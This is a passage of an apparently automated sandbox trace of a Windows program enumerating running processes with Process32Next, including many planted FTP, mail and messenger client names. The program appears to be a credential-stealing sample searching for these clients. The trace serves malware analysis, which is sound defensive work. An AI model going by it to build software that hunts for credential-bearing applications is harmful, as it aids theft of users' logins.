lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0230.592] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0230.594] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0230.596] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0230.598] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0230.600] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0230.610] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0230.613] CloseHandle (hObject=0x223c) returned 1 [0230.613] Sleep (dwMilliseconds=0x64) [0230.727] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2254 [0230.743] Process32First (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.745] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0230.748] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0230.750] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0230.752] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0230.754] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0230.757] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0230.759] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0230.761] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0230.794] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.797] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.799] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0230.802] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.804] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.806] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.809] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.812] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.815] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.819] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.822] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0230.824] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0230.827] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.830] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0230.906] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.907] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0230.909] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0230.910] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0230.912] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0230.914] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0230.917] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0230.919] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.920] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0230.922] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0230.924] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0230.926] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.928] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0230.929] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0230.931] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0230.933] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0230.935] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0230.937] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0230.975] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0230.978] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0230.980] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0230.984] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0230.986] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0230.987] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0230.990] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0230.992] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0230.995] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0230.998] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0231.001] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0231.003] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0231.006] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0231.009] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0231.096] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0231.099] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0231.102] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0231.104] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0231.107] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0231.111] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0231.113] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0231.116] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0231.119] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0231.124] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0231.127] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0231.130] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0231.202] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0231.206] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0231.209] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0231.212] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0231.217] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0231.220] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0231.222] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0231.227] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0231.231] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0231.233] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0231.236] Process32Next (in: hSnapshot=0x2254, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, 